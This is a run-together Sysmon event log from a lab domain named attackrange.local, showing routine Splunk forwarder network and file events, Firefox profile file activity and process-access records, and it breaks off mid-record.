354300x8000000000000000809108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:38.284{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57372-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:41.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2A07E280C6830012C02238F9A2074E,SHA256=BE546F41F9C6C9DCDB2CDAB3E74EE5089F13AECC0228E5B82D5643AABE6C8893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:41.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120313C5BA1726B9EBF50714C3B5098D,SHA256=D98ED148A933491BB73EBD3C2E3E9A82E100EF1213E84D21C6462897137F2830,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:34.782{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51149-false10.0.1.12-8000- 23542300x80000000000000001052124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:42.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C7F364E10047AE8219B04D062B36A9,SHA256=BE830823FE683F512E1129291B60B44CAC436F4B5BAF8FD74041F0E25947F200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:42.511{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9257BF1ACEA6852F85A1CE6B104AE24,SHA256=4A24299ADCB524EB21E6C4D489C2CA42E81D1EBD604F06F3B030878E73C3A18D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:43.527{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF6838013EF6F511B7AB1826537434E0,SHA256=AE21E5EB98D95C9A5067E7B63F03FE576ACE76BFDE595EC44438CD04B39176FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9577C816601E411A805BFDFABC088669,SHA256=1F94CAA34119F74F9941AC2C49F290D458A879B898B866F197188017229D9FC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C3B480FC25577705D748CFF239B784B6,SHA256=537C991CD0D33510E70CD228D68FF347A8FAE6655F95389EDE5FBF1168C7ABF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F6648DD84B7F9266F42A6056039AF765,SHA256=C15DBEC621FAE9C3E571E96A77A93EAB618A32D16921A7946C83AB9E0B485ABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2907D6BF6644DED9F15FCF991CFB258D,SHA256=AE72118D73F0753E990AC0DA5783C88B73A5583A0D255A7A72BA16C8C4E50817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F605C198571B207C7BF437C3DC364E13,SHA256=6AAC0232859E7CD99722BCE09714E25C196A842285BF1069EF9B863C7E94BDE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BDBDABF57D17F180829C363D707C4F39,SHA256=DAEB9FDC40EFB5D0B94D86CD36F67A74EE3B47495D570F6F36BA47C5570A5DC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=904DBA71FF07C9F49423E6AFA5D26E08,SHA256=4C394BB4BD42B35F7FBDC176C3D69AE8471DACEF441A193F628353F8E6D3A2A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5B079AB26F4AFC22CA97A41F9494AAE4,SHA256=0B83B628502385324CE3B05D1EF6415D4C9B248554AF5104E88D2A082C737038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=29D26A6719BF924EE33BA616FBCB1D38,SHA256=67CBD60C05BEB5748A1A0BDCD4EC0DA02CD3E72ED12ED65BD60C4FD6BA4BC4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9F0EDCDFC7570E41DA2CE289CC22D260,SHA256=44B2E246250CB87E87DB65676D14F3AE2D1F7C91CF04A0CF0F074B74977A07BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.816{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C0ABD7F46371828E094B60FFFA4D7B69,SHA256=91D482D20232CB07B56177FCD14AAEA79792485C219C3F2A0536B7ED4187E541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:43.479{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A8868B770219391F84D7D8077F56A6D,SHA256=ED305CE1EDF8676DCC3F0C2A92B3FA44D75D56BA4814B133D1220D4A7E5D0648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:44.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A798991371413A7EB8C59F4FF4E76233,SHA256=7B4DF8E48EA53BDF1009C5633739580A1F0740C2D3A7942A781CAE38EAC8918F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:44.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B38F8AA7798ACE9D3854389394550D7C,SHA256=E882B3437E5E5A249AE58693393D6638E02E0DFD2235683D5569DCB5627A90AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:44.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDD00ECA18B7C0D84984D79A8D33DF69,SHA256=7025232E94F8A4E5B9CD8AA0A15B5496777938ED243758A61B21161BEAB47DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:44.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8747C465A75458984FE2E5A23E2AD370,SHA256=308C3A1CF4CE39501919F5BB03B879F20F8C2395F1B3772AB0A870028C37AF9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:45.516{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B599F824112F14AF51B5E54C7AB2CF5E,SHA256=D48F6BB853AFFBA69F729CBD7ECA8B47974C4AA6959CBA8594836A9271FFCB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:45.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95F57A0464DC1BD4561A5154501001CA,SHA256=DCD67389444C6A2E6375EBF582AB59BA322E40168D49CE02DF80912474DA7EDA,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000809114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:44.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:46.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7149CB9DF9BEEE2EF63E6768CD5DCC16,SHA256=987C302DDDC7A97055ABB10DD88FF87B62AFE621E207DA663750512522FF06BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:46.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B1A813036E178C1898630E87250EEA,SHA256=DAA159308285F8ED3867ED64A536D955968923F9806CD0D38574277BFF47974B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:47.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFFB0B0FD65C8611A4E1572504BEB09,SHA256=9AEF0CA3F93E67A2FE3A6677847D6C8AEA4D56A1092A7164882EF94469A0291D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:47.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=398E0B8AAABC9140CF67720FA37DF174,SHA256=22493AA970B165996ACCC48C4EDB39020797C336EE5B134FD608C797E364BF45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:48.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E19D0BB00BA2AD496DF322B58BD1B0C8,SHA256=863B5E03CD8F7F257BDDFA28BB97DA4E0BF655A0445B4D4229760510BABE6DBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:40.713{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51150-false10.0.1.12-8000- 23542300x80000000000000001052144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:48.549{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E00EC99178C721E58A93C8E67107F94,SHA256=FD0D5157BC81E28A36D2F1270A2D4811B7F0E3A2A409B6AF5DA47FACC32593D3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:49.652{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E7B48EF81383D3BAFDC2CB04CFB423E,SHA256=54F745011896724B7E06EF0F7502E54A0FB025C2D1C87E80092CCE901554EF7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:49.579{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17BDFCCE6881AA801B4050AD716F0C6C,SHA256=486E217C0A5811184D7D9245E41261E0EEDE97786471C87988BCCED7C4FFEECD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.964{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.950{466BC892-F6B2-60EB-A37D-00000000CF01}1724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.580{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF61212A7207128B1F902547DE2E85C2,SHA256=A357054C213AF7857D1A7E7B9DEA7326AF5768D318289FE1073E1156D9F78BB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:00:50.668{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91DC38B35EB51A7B7C841F2557FEBC71,SHA256=504F8E0CF48A1F61AE34748A7384619CC772BAAFBAEBC4D46E5E5097E0ED11DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:00:50.302{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6B2-60EB-A27D-00000000CF01}8104C:\Program 